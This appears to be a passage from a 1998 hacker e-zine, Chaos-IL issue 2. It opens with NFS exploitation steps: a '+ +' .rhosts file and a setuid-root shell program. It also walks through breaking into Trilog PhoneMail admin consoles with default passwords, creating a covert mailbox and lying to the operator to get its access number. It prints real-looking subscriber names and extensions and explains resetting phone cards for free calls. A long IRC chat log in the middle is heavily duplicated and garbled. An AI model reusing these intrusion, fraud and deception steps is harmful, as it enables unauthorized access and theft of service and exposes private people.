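An export flagged as "home" is the one to fix first: restrict it to named client hosts, and treat any wildcard .rhosts entry under it as a sign the account needs review.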
in order to mount you need to type(as root) mount -t nfs remote:/directory /local/dir or mount -F nfs remote:/directory /local/dir (the directory must exist) Mount with rw, and then put in a users home directory a .rhosts with a line containing "+ +" and then rlogin with that user then hacking the system is even easier, make a file called test.c containing the following line: main(){setuid(0);setgid(0);system("/bin/sh")} you can replace sh by your favorite available sh. now compile it: cc test.c -o test Now, if you have mounted it with "rw" succesfully then you can now chown it to root then chmod u+s test and you've hacked it!! (c) CHAOS-IL 1998 _____________________________________________________________________________ 09. Phun qoutes from #chaos-il -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- That was a phunny chat about some guy who didn't knew ACTVNET switched prices since thier first offer (4 months :)) Read carefully and you might also learn some shit about Linux ppp scripting.. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- yo yo yo came for a sec.. yo 'sup? ok hmm.. still have ppp connection prob'z i will try now some other method to connect squish wasn't able to help me so much you voiced with him? huh? yeah your linux is fucked,its not my problem [squish]: just said, u couldn't help me so much.. i installed linux today, and in my FIRST try it worked it ain't fucked and i installed it too.. and it didn't work eheh don't blame me u were the one who said he knows how to fix it squish is a leeeeeeeeeeeeeeet BSD geezer , he dont bother giving advise to use lame LINUX users :) for payment he will BitchX-74p1+ by panasync - Linux 2.0.33 Br2: if squish didnt fixed your linux... then NO ONE can :) i installed linux today :) and it worked on the FIRST time [d2-rN^_]: i give him payment 'sup? ok hmm.. 
still have ppp connection prob'z i will try now some other method to connect squish wasn't able to help me so much you voiced with him? huh? yeah your linux is fucked,its not my problem [squish]: just said, u couldn't help me so much.. i installed linux today, and in my FIRST try it worked it ain't fucked and i installed it too.. and it didn't work don't blame me eheh Br2 : i do i know how to connect via liunx yeah but it doesn't work u were the one who said he knows how to fix it squish is a leeeeeeeeeeeeeeet BSD geezer , he dont bother giving advise to use lame LINUX users :) for payment he will BitchX-74p1+ by panasync - Linux 2.0.33 i installed linux today Br2: if squish didnt fixed your linux... then NO ONE can :) :) and it worked on the FIRST time [d2-rN^_]: i give him payment Br2 : i do i know how to connect via liunx yeah i know how to connect to.. i even gave him my kernel :) but didn't work but it doesn't work heh i know how to connect to.. i even gave him my kernel :) but didn't work squish - can ya dcc me bitchX? heh i will now try other method squish, why u gone back 2 LINUX ? i will now try other method bitchx binary for linux? just to help me [d2-rN^_]: just to help me squish - yes.. d2-rN^_ : for all the programs i must use them heh ok .. onme se c Br2, whats your problem wiv it ? u mean what's my ppp prob? yep welp.. i tried connecting in many ways bitchx binary for linux? just to help me [d2-rN^_]: just to help me squish - yes.. d2-rN^_ : for all the programs i must use them heh ok .. onme se c Br2, whats your problem wiv it ? u mean what's my ppp prob? yep welp.. i tried connecting in many ways i dont get yar prob man just get a cool ppp script and thats all with 'dip' .. after doing 'mode ppp' it just hangs-up *** Joins: BiT (blah@ts002p4.pop6a.netvision.net.il) dip?! nonononononon ugly Br2: u'w using INET GOld? squish: told me.. u may need a script u may need a script [m0ta_boy]: yes i do have a script mode ppp ? u mean pppd ? 
*** Quits: Emaker (bbl..) ppp-up dip works fine [d2-rN^_]: no i mean mode ppp - squish told me d2: ugly??? ITS THE EASYES THING TO USE IT U'R ISP CAN SUPPORT IT DIP RULEZ DIP RULEZ :) i got ppp-up, i tryed and i connected to the net BUT *** m0ta_boy is now known as dip_now i couldn't use any commands [morpher]: i have one but m0ta: no it aint mate :) seriously , it took me 2 months to figure out dip . and 1 hour to figure out pppd i can't use the commands of the ppp like telnet/ftp/etc... didn't work *** dip_now is now known as m0ta_boy like ignoring me ... keep thinking ping d2: 2 months to figure out dip??? for god's sake.. only works when i ping my local ip i got from the isp hmm hmm yeah hmm d2: i didn't figure out anything. 'mode ppp' worked on first try m0ta_boy, the fucking thing just didnt want 2 work hey morpher hmm what does "ifconfig -a" gives you when you're connected? your friend his here ! give even easy hehhe is *** Quits: mohawk_ (Ping timeout: 180 seconds) :) [squish]: u'r talking to me? yes [morpher]: i'm morpher's friend try to conncet i can't needa reboot first i just mailed some ppl who knows linux well, some ppp-howto writers :) *** Parts: Lehavoth (~Lehavoth@I-CENTRAL.COM) welp i needa go you're telling morpher you're morpher's friend? Br2: i alreay said, CALL THEM : i'll be back ) *** Joins: Lehavoth (~Lehavoth@I-CENTRAL.COM) Br2: i alreay said, CALL THEM ASK IF THEY GOT A SCRIPT FOR UNIX/LINUX USERS m0ta_boy, i got pppd connect 'chat -v "" ATDT01816612521 CONNECT " " ogin: xxxx word: xx' /dev/cua0 38400 modem noipdefault defaultroute crtscts debug :) [squish]: yeah, i'm squish'z friend m0ta: call who? [m0ta_boy]: the isp? inet - gold yes i did they don't support linux but i do have script as a matter a fact i have 2 script'z it ain't the script problem netvision give their script oh, u did? ohhhh something fucked up.. *** ^[dSN]^ sets mode: +o Lehavoth THEY SUCK AND THEiR SLOW ( i don't care what obiectivy say) LEAVE INET GOLD NOW ! 
:) i will i will go to actvnet Br2, if u can only ping your isp nalan even 135 didn't work for him first needa sell my line then it sounds like a route problem 135 works 100% with dip, or any other script Br2: actvnet suck bigtime!@! [d2-rN^_]:1 i can't ping my isp!!! [morpher]:1 framerelay.. not the 8 ppl on one nalan Br2, can u ping anything ? *** Parts: Phalanx (~Phalanx@I-CENTRAL.COM) squish: yeah, 135 doesnt makes problems at any field :) e.g blue boxing :) [d2-rN^_]: yeah, my local ip of the connection that i saw in /var/log/message *** Joins: Phalanx (~Phalanx@I-CENTRAL.COM) yeah :) with 'dip' .. after doing 'mode ppp' dip?! nonononononon ugly *** Joins: BiT (blah@ts002p4.pop6a.netvision.net.il) it just hangs-up Br2: u'w using INET GOld? squish: told me.. u may need a script [m0ta_boy]: yes mode ppp ? u mean pppd ? i do have a script *** Quits: Emaker (bbl..) ppp-up dip works fine [d2-rN^_]: no i mean mode ppp - squish told me Br2: it has nothing to do with it. since the moved all to shani, and started taking 200$ per month they SUCK *** ^[dSN]^ sets mode: +o Phalanx and even that deoesn't work for him d2: ugly??? ITS THE EASYES THING TO USE IT U'R ISP CAN SUPPORT IT DIP RULEZ DIP RULEZ :) i got ppp-up, i dont get yar prob man i tryed and i connected to the net BUT *** m0ta_boy is now known as dip_now just get a cool ppp script and thats all i couldn't use any commands [morpher]: i have one m0ta: no it aint mate :) seriously , it took me 2 months to figure out dip . and 1 hour to figure out pppd but i can't use the commands of the ppp like telnet/ftp/etc... Br2, well u shouldnt b able 2 do that :) but not the remote IP ? they didn't, they take 35$... Session Close: Tue Apr 07 00:51:28 1998 when i asked them Br2: HAHAHAHAHAHA when he tail -f /var/adm/messages shani is the most lagged ass notwork network even shown up... 
eh should b able 2 do that even :) he GETS a local and remote IP Br2: DO U KNOW THAT SINCE THE TOOK 35$ THEY TOOK THE PRICES UP 3-4 TIMES ?!?!?!??!?!?! Br2: DO U KNOW THAT SINCE THE TOOK 35$ THEY TOOK THE PRICES UP 3-4 TIMES ?!?!?!??!?!?! no i didn't knew that but in the TAROCHA Br2 my friend wait 3month for actvnet nalan they said BEZEQ FREEZE THE NALAN they said squish, errr yeah it's still 35$ Br2: you live in a DIRA? or a private house? dira.. *** Quits: Lehavoth (Read error: 0 (Undefined error: 0)) ok it will cost less bye dude'z *** Easy changes topic to 'Articles for ISSUE3 --> morpher@netlimit.com ACTIVNET=SUX BIG TIME' *** Quits: Br2 (lAST hACKER aROUND BBs - o3.6997657 - *ISRAEL*, 10,000+ h/p/c/v files!) Br2: THEY SUCK. THE PUT EVERY1 ON SHANI NOW (NO NETVISION) SO ITS SLOW AND THEY TAKE TO MUCH MONEY. ITS NOT 35$ BELIVE ME!! m0ta_boy: put the CAPS OFF!!! eheh what do you care *** Quits: d2-rN^_ (Who was this elvis Bloke then, anyway ??) Easy: sorry, i was mad :) ITS SUX! let him order whatever he wishes too blah..

[EOF]
_____________________________________________________________________________

10. Setting your own VMB in Trilog PhoneMail Systems

(c) Chaos-IL Foundation 1998

+--------------------------------------------------------+
|                                                        |
|    Setting your own VMB in Trilog PhoneMail Systems    |
|                                                        |
+--------------------------------------------------------+
                - ---[ by morpher ]--- -

Trilog PM Systems

What is Trilog? Well, Trilog is a Voice/Phone Mail boxes network that provides full VMB (Voice Message Box) services plus options to contact other VMB boxes on the network. Each VMB has its own network identification number. (Trilog boxes aren't a full VMB service, but we'll pretend they are so things will be clear :P)

Trilog runs PM (PhoneMail) monitoring Systems that can be found on the 177 free toll, and soon to be found on the 1-800 free toll also. Each PM system includes its own data of VMBs, User details (the VMB owners, etc.)
A Trilog PM system allows you to control and monitor everything possible in the current data that the PM has.

This article will basically show you the easiest way to set yourself up a VMB on these systems. I think I explained it pretty clearly so if you can't follow this, you have an IQ of 80 or less.. Dumb fucker.

As usual, use a scanner to scan for the Trilog PM systems; this is the easiest part. There are over 20 systems that I know of in the 177 free toll. If you find one of their VMBs in the scanning, or you just have a number of one somehow, try to dial numbers similar to the VMB's to get the Trilog PM sys. For example, if you have some Trilog VMB number... 177-022-1212, try dialing similar numbers such as 177-000-1213 or the like. The PM system that controls this VMB, and many more, is mostly found in the same digits as all of its VMBs.

This is what a Trilog PM system usually looks like:

    CARRIER 1200

    Trilog PM 9252 9254 Microcode Version 5.2
    Copyright (C) PM Systems 1991 All Rights Reserved.

    PM Login>

Older versions of Trilog will drop you to a "Command %" prompt, but for the most part, use the previous description in identifying them.

Typing "?" at the PM Login prompt will show the valid login accounts.

    PM Login> ?
    Valid login modes are: SYSADMIN, TECH, POLL.

Possible defaults for these accounts follow:

    PM Login    PM Password
    --------    -----------
    SYSADMIN    SYSADMIN,FIELD,TECH,SYS,ADMIN,
    TECH        FIELD,TECH,SYS,ADMIN
    POLL        FIELD,POLL,TECH,SYS,ADMIN

    PM Login>TECH
    PM Password>
    Invalid Password.
    PM Password>
    PM Action>                  (woo-hoo! ..you're in! :P)

*NOTE* This time default logins WORK! Nobody expects anyone to try breaking in.

Once logged in, you will most likely get a "PM Action>" prompt. Typing "?" displays the following:

    PM Action>?
    The following commands are valid:

    Activate  - Activate the session
    Broadcast - Broadcast a message to all terminals
    Connect   - Invoke the subsystem
    Terminate - Terminate the session
    List      - List all open sessions
    Logout    - Terminate all sessions and log off.
    Login     - Logout and login again.
    Display   - Display sessions status on a site.
    TechView  - Enable/Disable TechView training.

We first must connect to the subsystem, which is where all commands are invoked to control/monitor the voice mail system. Type "connect":

    PM Action>connect
    Screen 1 - SVI on Node 1 is now active.

You will now be brought to a "Node # - SVI>" prompt. Typing "?" displays the following.

    Node 1 - SVI>?
    Sat Jul 6, 1996 6:39 PM

    ----- INLINE COMMANDS -----
    ?  help  exit

    ----- UTILITIES -----
    AdjustLineLimits    APDBUpgrade         AssignClasses       Backupdatabase
    BackupFixup5051     BackupNames         CallProcessing      ChannelTrace
    CheckLDNetConfig    CheckNetWork        CleanUpLDN          Clearcrashdump
    ConfigTrilog        ConfigSite          ConfigTrunk         ConvertDB
    CopyDisk            CopySoftWare        Cvt37To42           Cvt41To42
    CvtFrom42           DB41Upgrade         DBXF369To41         Dir
    DisplayLineLimits   DownTrilog          EditPBXTrans        EnableTNAC
    ExpandDatabase      FEDParameters       FFormat             FixDB369To41
    FixDB37To42         FixNames            Fixupdatabase       Fixvoicefiles
    HardReset           HDErrorList         HdInfo              InbandLog
    InstallFile         InstallOption       Listconfig          ListError
    ListLDNetConfig     Listlog             Listoptions         ListPrompt
    ListVersion         LoadPrompts         MessageTrackingLog  MonitorPBXLink
    MonitorTAPLink      NetDetective        Newdisk             OCConfigAndTest
    ReassignBlock       RemoveOption        Reset               Restoredatabase
    RestoreFile         RestoreNames        Sa                  ScanDisk
    SearchCentrexLog    Settime             StartCentrexLog     StartHostLink
    StopCentrexLog      StopHostLink        SystemStatus        TalkToLDNSite
    TAlog               TestDisk            TestHostLink        TestPBXLink
    TestTrilog          TestTrunk           TestVoice           UpDateCBXMWI
    UpgradeDB           UpTrilog

"Sa" is the System Administration utility. This command can be passworded (I've found two Trilog PM systems... one was passworded, one wasn't) and accounts such as POLL may not have access to this option.
    Node 1 - SVI>sa
    Sat Jul 6, 1996 6:39 PM
    Trilog is active with 12 Channels

    Function:
    Sat Jul 6, 1996 6:40 PM
    Specify a function -
    ActivatePM        AssignClasses     BackupDataBase    BackupNames
    CallProcessing    ClassOfService    ConfigSite        DeactivatePM
    DList             FFormat           LDNSiteStat       ListLDNMsgLog
    LogOff            MonitorLogon      NodeParameters    OCConfigAndTest
    OCMessageLog      Profile           Reports           Status
    SysParameters     SysStatistics

At the "Function:" prompt, you can specify different system administration functions. The one we will be working with in setting up a VMB is the "profile" function.

    Function: profile       Sat Jul 6, 1996 6:40 PM
    Action: ?
    Specify an action -
    Add  All  Clear  Delete  Fix  List  Modify  Purge

The action "All" will display all user profiles.

    Function: profile       Sat Jul 6, 1996 6:40 PM
    Action: All

         Subscriber Name         Node  Extensions  Group Name
         ----------------------  ----  ----------  -----------------------
      1: HERTZOG DAN             1     3508        BDM
      2: HOFFMAN NIR             1     3711        PATENTS
      3: MOSKOUVITCH YAKOOV      1     3676        BDM
      4: DORON SERA              1     3552        SIG91
      5: EMMANUEL DAYAN          1     3650        BDM
      6: AMDURSKI OREN           1     3579        WALLINGFORD
      7: BELTANGADY MOHAN        1     3649        SIG91
                                       3880
      8: BALDESTEIN ALEX         1     3656        SIG91
      9: DAVID GROSS             1     3580        BDM
     10: BERKMAN ARIEL           1     3712        PATENTS
     11: GOLDMAN RAFI            1     3531
     12: HEROLD LINDA            1     3554        SIG91
     13: HEROLD AVI              1     3514        BDM
     14: BERNSTEIN ERIC          1     3532        BDM

This is useful especially in this case because you want your mailbox to blend in with the others. In this case, you would want to set up a mailbox at box number 3[5678]XX instead of box 1111 or 9999.

The "list" action under the system administrator function profile lists a user's profile in complete detail, showing all settings with their specified mailbox.
    Function: profile       Sat Jul 6, 1996 6:40 PM
    Action: list
    Subscriber Name or Extension: 3571

    Name (last first)       HOFFMAN NIR
    Class Number            10
    Extension Number [ 1]:  3571
    Home Site Number        0
    Trilog Password         ##########
    Group Name              SIG91
    Referral Extension      3656
    Trilog Capability
        Accept Messages   Answer Phone   Do Message Alert
        TRUE              TRUE           TRUE
    Abbreviated Prompts?    FALSE
    Alt Greeting Active?    FALSE
    Software Mailbox        FALSE
    Failed Acc Attempt      0
    Number of PDLs Used     0
    Waiting Trilog          0
    Waiting Trilog ML       0
    Sent Trilog             4
    Sent Trilog ML          144
    Recd Trilog             510
    Recd Trilog ML          15413
    Direct Calls            553
    Forwarded Calls         0
    Access Length           37933
    Deletions               523
    Retention Length        9449
    Attempted Outcalls      0
    Successful Outcalls     0
    Outcall Access Len      0
    Future Dlv Messages     0
    LDN Exped Msgs Rcvd     11
    LDN Exped ML Rcvd       633
    LDN Normal Msgs Rcvd    0
    LDN Normal ML Rcvd      0
    LDN Exped Msgs Sent     0
    LDN Exped ML Sent       0
    LDN Normal Msgs Sent    0
    LDN Normal ML Sent      0
    Last Access Time        Wed Jul 3, 1996 9:54 AM
    Last Password Change    Wed May 22, 1996 3:18 PM

This information can be used as a basis for your own entries if you're not sure what to enter when adding your own profile.

Now, let's add our own profile (mailbox). For this, we use the action "add" under the system administration function profile.

    Function: profile       Sat Jul 6, 1996 6:42 PM
    Action: add

    Name (last first)    : PM
    Class Number         : 10
    Extension Number [1] 3500
    Extension Number [2]
    Trilog Password      : (Default = ##########):
    Group Name           : (Default = ):
    Referral Extension   : (Default = 0):
    Trilog Capability: (Default =
        Accept Messages   Answer Phone   Do Message Alert
        TRUE              TRUE           TRUE
    Enter T or F for each field):
    Abbreviated Prompts?: (Default = FALSE):
    Alt Greeting Active?: (Default = FALSE):
    Software Mailbox     : (Default = FALSE):
    Failed Acc Attempt   : (Default = 0):

    If you wish to exit, type ";".
    First Field of Form:
    Name (last first)    : (Previous = PM): ;
    Done.
    Name (last first)    : ;

Now we have our own mailbox at box #3500.
(for access info see end of article)

Let's take a closer look at the steps involved:

    Name (last first)    : PM

Selecting a name. Here, I chose "PM" as I thought the System Admin to be an idiot who would think it is a default box and not mess with it. A regular name will blend in well with the others though.

    Class Number         : 10

Selecting a class number designates what class your mailbox is under. Certain classes have different options, such as being able to have more messages w/o being forced to delete them, or having the dialout feature. Check out the "ClassOfService" function.

    Extension Number [1] 3500

Enter a mailbox number you wish to have which is empty.

    Extension Number [2]

If you want to set up more than one mailbox with the same profile.

    Trilog Password      : (Default = ##########):

Enter the password you would like to have. It will not be echoed to the screen.

    Group Name           : (Default = ):
    Referral Extension   : (Default = 0):
    Trilog Capability: (Default =
        Accept Messages   Answer Phone   Do Message Alert
        TRUE              TRUE           TRUE
    Enter T or F for each field):
    Abbreviated Prompts?: (Default = FALSE):
    Alt Greeting Active?: (Default = FALSE):
    Software Mailbox     : (Default = FALSE):
    Failed Acc Attempt   : (Default = 0):

Go with the defaults for a regular mailbox here. They should be set up correctly.

    If you wish to exit, type ";".
    First Field of Form:
    Name (last first)    : (Previous = PM): ;
    Done.
    Name (last first)    : ;

Keep smacking ";" to exit.

Now let's verify that the profile was added.

    Function: profile       Sat Jul 6, 1996 6:45 PM
    Action: list
    Subscriber Name or Extension: 3500

    Name (last first)       PM
    Class Number            10
    Extension Number [ 1]:  3500
    Home Site Number        0
    Trilog Password         ##########
    Group Name
    Referral Extension      0
    Trilog Capability
        Accept Messages   Answer Phone   Do Message Alert
        TRUE              TRUE           TRUE
    Abbreviated Prompts?    FALSE
    Alt Greeting Active?    FALSE
    Software Mailbox        FALSE
    Failed Acc Attempt      0
    Number of PDLs Used     0
    Waiting Trilog          0
    Waiting Trilog ML       0
    Sent Trilog             0
    Sent Trilog ML          0
    Recd Trilog             0
    Recd Trilog ML          0
    Direct Calls            0
    Forwarded Calls         0
    Access Length           0
    Deletions               0
    Retention Length        0
    Attempted Outcalls      0
    Successful Outcalls     0
    Outcall Access Len      0
    Future Dlv Messages     0
    LDN Exped Msgs Rcvd     0
    LDN Exped ML Rcvd       0
    LDN Normal Msgs Rcvd    0
    LDN Normal ML Rcvd      0
    LDN Exped Msgs Sent     0
    LDN Exped ML Sent       0
    LDN Normal Msgs Sent    0
    LDN Normal ML Sent      0
    Last Access Time        Sat Jul 6, 1996 6:42 PM
    Last Password Change    Sat Jul 6, 1996 6:43 PM

    Subscriber Name or Extension:

Good. You now have a VMB.

Accessing your VMB's 177 number
+-----------------------------+

Ok, you got your box up at #BLABLA on the network. At this point we get into a little problem, but one that can be simply resolved. Normally, the people who own the VMBs and pay for them get the 177 access number to their box at the time they register, but we didn't :)) so the last mighty thing we can do is call Trilog and fool them, so you'll get your new box access number and start running things up. Follow me and dont mix bullshits, you'll have your VMB access number in less than 2 mins.

The Trilog Info. center is at 177-022-4470 :
The direct number to the Info. center cannot be found, or they dont publish it. If anyone finds it sooner or later, please hook me up and email me.

Call up the Info. Center and wait for an operator to pick up, then give them your box number as you set it in the PM system (e.g. #3500). Simply say that you are leaving Israel in a few days for a trip, and you want to give your friends the VMB 177 number so they can leave you msgs while you are away. In 90% of the cases she'll simply give you the number and say a nice byebye, in 70% of the cases she'll ask a few identification questions and then give you the number :)) (she wont ask anything like card number, etc. only info printed at her desk..
and that's actually the info that you saw while setting your VMB up.) Remember to print/capture this info so you'll know what to answer the Trilog operator when you're asked.

*Have phun*

morpher.

11. TeleCards Resetting

TeleCards Resetting
-------------------

Telecards' working method is a really simple one actually: all they check for is those little black magnetic lines which mark the usage of a call. Now, you may wonder how the fuck can I use it for my benefit? Well, let me tell you how you can do such a thing.

All you need is a needle and a magnet. The first thing you do is take a telecard, a used one of course. Take the needle and squeeze it into the middle of the black line. After you've succeeded in doing that, and brought that black stripe to the edge of the card, just simply take a magnet and pull the black stripe with it. It might take a while until you get the hang of it, but finally you'll do it right. After doing that, you can actually reset the whole card and make it new again, over and over again.

NOTE:
------
Since Bezeq has learnt about that method, you should search for the older cards which don't have a plastic cover on that black stripe.

OXiD

09. Resources & Credits

Chaos-IL would like to greet every possible resource who supported us or helped us in any kind of way.

Bezeq TeleCommunications INC. Barak Israel-International INC. GreenShop Computers (TEL-AVIV) IDC Communications INC. AT&T Communications INC. SPRINT Global-One Communications Israel Telegraph LTD. 2600 Magazine Phrack INC.
Newsletter Informatik E-Magazine PLA-Phone Losers of America Hacker's Heaven (BBS) Underground Society (BBS) Route 66 (BBS) Liquid Underground (BBS) #hack #phreak #telephony #punx #root www.border.com www.etext.org www.l0pht.com www.lat.com www.liquid98.com www.itd.nrl.navy.mil ftp.fc.net The Prototype Captain Crunch Emmanuel Goldstein TS (Bezeq 144/199 Operator) CB (Bezeq 188 Operator) NI (Sprint Global One Operator) Retro Manomaker Unix geek Phriend The Milkman Anti-D Lizzard King Stoner Dr. Grass Dead Zed Blackbird Prophet Substance Stoner F0k Mindroot Toast BelowZero *ALL of Chaos-IL Members -[EOI#2]---------------------------------------------------------------------- (c) Chaos-IL Foundation April 1998